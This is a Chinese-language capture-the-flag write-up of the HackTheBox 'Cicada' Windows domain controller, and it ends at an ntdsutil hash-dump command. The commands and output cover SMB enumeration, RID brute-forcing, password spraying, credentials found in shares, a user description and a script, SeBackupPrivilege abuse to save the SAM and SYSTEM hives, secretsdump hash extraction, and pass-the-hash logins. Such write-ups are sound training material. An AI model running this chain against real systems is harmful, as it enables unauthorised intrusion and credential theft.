从零开始的windows生活-Cicada

Sweet dreams are made of this
Who am I to disagree?
Travel the world and the seven seas
Everybody’s looking for something

靶机ip:10.129.254.81

难度:低

涉及内容:smb共享枚举,smb用户枚举,密码喷洒,backup特权组用户利用,哈希抓取

信息收集

nmap全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- -Pn --min-rate=1000 10.129.254.81
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 04:11 EST
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 96.62% done; ETC: 04:13 (0:00:04 remaining)
Nmap scan report for 10.129.254.81
Host is up (0.14s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
64756/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 124.16 seconds

nmap细节扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -A -sV -sC -p53,88,135,139,389,445,464,593,636,3268,3269 --min-rate=1000 10.129.254.81 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 04:15 EST
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:16 (0:00:00 remaining)
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.77% done; ETC: 04:16 (0:00:00 remaining)
Nmap scan report for 10.129.254.81
Host is up (0.12s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-12 16:15:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-12T16:16:22
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m01s

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   135.57 ms 10.10.14.1
2   135.70 ms 10.129.254.81

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.38 seconds

将靶机域名写入hosts

1
2
3
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.254.81 CICADA-DC CICADA-DC.htb cicada.htb cicada-dc CICADA-DC.cicada.htb" | tee -a /etc/hosts
10.129.254.81 CICADA-DC CICADA-DC.htb cicada.htb cicada-dc CICADA-DC.cicada.htb

smb共享文件夹枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.254.81                                                               
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.254.81 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

发现不常见文件目录名:HR,进行进一步探测

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //10.129.254.81/HR
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 459560 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \>

得到通知文件,下载下来进行查看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

得到用户标准密码,由于 Guest 账户是启用的,我们可以利用它来枚举域内的其他用户 SID,从而获取用户名列表,准备进行用户枚举。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u guest -p '' --rid-brute
SMB         10.129.254.81   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.129.254.81   445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.254.81   445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.254.81   445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.254.81   445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.254.81   445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.254.81   445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.254.81   445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.254.81   445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.254.81   445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

这里用的是nxc,但lookupsid同样可行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

将SidTypeUser的用户名整理成用户名字典。

1
2
3
4
5
6
7
8
9
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

接下来我们使用密码喷洒找出没有修改默认密码的用户。

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' 
SMB         10.129.254.81   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.129.254.81   445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.254.81   445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.254.81   445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.254.81   445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.254.81   445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.254.81   445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.254.81   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

michael.wrightson没有修改密码,看看他是否可以winrm上去。虽然有了密码,但该用户可能不在 Remote Management Users 组中,所以无法远程登录,我们需要继续挖掘他在 SMB 中的权限。

1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'                  
WINRM       10.129.254.81   5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) 
WINRM       10.129.254.81   5985   CICADA-DC        [-] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

看来不可行,那么以他的身份列出其他用户和共享。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'michael.wrightson'  -p 'Cicada$M6Corpb*@Lp#nZp!8'  --users
SMB         10.129.254.81   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.129.254.81   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.254.81   445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-                                
SMB         10.129.254.81   445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain                                                                                                                                                  
SMB         10.129.254.81   445    CICADA-DC        Guest                         2024-08-28 17:26:56 1       Built-in account for guest access to the computer/domain                                                                                                                                                
SMB         10.129.254.81   445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account 
SMB         10.129.254.81   445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1        
SMB         10.129.254.81   445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1        
SMB         10.129.254.81   445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0        
SMB         10.129.254.81   445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3                                                                                                                                                     
SMB         10.129.254.81   445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0        
SMB         10.129.254.81   445    CICADA-DC        [*] Enumerated 8 local users: CICADA
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'michael.wrightson'  -p 'Cicada$M6Corpb*@Lp#nZp!8'  --shares
SMB         10.129.254.81   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.129.254.81   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.254.81   445    CICADA-DC        [*] Enumerated shares
SMB         10.129.254.81   445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.254.81   445    CICADA-DC        -----           -----------     ------
SMB         10.129.254.81   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.254.81   445    CICADA-DC        C$                              Default share
SMB         10.129.254.81   445    CICADA-DC        DEV                             
SMB         10.129.254.81   445    CICADA-DC        HR              READ            
SMB         10.129.254.81   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.254.81   445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.254.81   445    CICADA-DC        SYSVOL          READ            Logon server share

得到两个有价值的信息,1是一个叫david.orelious的用户说他的密码是aRt$Lp#7t*VQ!3,二是以该用户的身份列出共享发现新的文件夹DEV,但不可读。

那么以刚发现的用户david.orelious的身份试试。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares               
SMB         10.129.254.81   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.129.254.81   445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.254.81   445    CICADA-DC        [*] Enumerated shares
SMB         10.129.254.81   445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.254.81   445    CICADA-DC        -----           -----------     ------
SMB         10.129.254.81   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.254.81   445    CICADA-DC        C$                              Default share
SMB         10.129.254.81   445    CICADA-DC        DEV             READ            
SMB         10.129.254.81   445    CICADA-DC        HR              READ            
SMB         10.129.254.81   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.254.81   445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.254.81   445    CICADA-DC        SYSVOL          READ            Logon server share

可读,那么进入该目录下方查看文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -U 'david.orelious' //10.129.254.81/DEV                  
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 481778 blocks available
smb: \> get "Backup_script.ps1"
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \>

得到名叫备份脚本的文件,查看此文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

USER

得到用户emily.oscars的凭据,尝试是否有winrm的权限。

1
2
3
4
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'        
WINRM       10.129.254.81   5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) 
WINRM       10.129.254.81   5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)

有,那么使用evil-winrm登录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i cicada-dc.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'                                       
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

查看当前用户身份与特权组

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

其拥有备份管理员权限,那么可以将sam文件和system文件备份并下载

SeBackupPrivilege(备份文件和目录权限)是 Windows 操作系统中的一种特权,它允许用户绕过文件和目录的权限限制来读取文件,以便执行备份操作。

当你在 whoami /priv 的输出中看到 SeBackupPrivilege 状态为 Enabled 时,意味着当前用户拥有读取系统上任何文件的权限,即使是管理员(Administrator)或系统(SYSTEM)锁定的敏感文件也不例外。

以下是关于该权限的详细解释及其在安全领域的含义:

1. 它的作用是什么?

  • 官方定义:该权限授予用户读取所有文件以进行备份的能力,无论文件的访问控制列表(ACL)如何设置。
  • 设计初衷:它是为了让备份软件(如 Windows Server Backup)或属于“Backup Operators”组的人员能够备份整个系统,包括操作系统锁定的核心文件。
  • 权限绕过:拥有此权限的用户可以读取他们本不应有权访问的文件(例如其他用户的私有文件夹、系统配置文件等)。

2. 为什么它是高危漏洞(提权向量)?

在黑客攻击或渗透测试(如 HackTheBox 的 Cicada 靶机)中,如果一个非管理员账户(如 emily.oscars)拥有此权限,攻击者可以利用它获取最高权限(SYSTEM 权限):

  1. 访问敏感注册表文件:攻击者可以利用此权限读取并复制 Windows 的核心注册表文件,特别是 SAM(安全账户管理器)和 SYSTEM
    • SAM 包含本地用户的密码哈希(NTLM Hash)。
    • SYSTEM 包含解密 SAM 文件所需的引导密钥(Boot Key)。
  2. 访问域数据库:如果是域控制器,攻击者还可以复制 ntds.dit 文件,其中包含整个活动目录的所有用户哈希。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam 
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
                                        
Info: Download successful!

使用impacket的secretdump模块抓取哈希

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

验证可行性

1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'   
WINRM       10.129.254.81   5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) 
WINRM       10.129.254.81   5985   CICADA-DC        [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)

现在可以使用evil-winrm登录到管理员账户了。

Administrator

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator

拿到管理员哈希之后我们可以用ntdsutil模块拿到域中所有成员的哈希

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -M ntdsutil
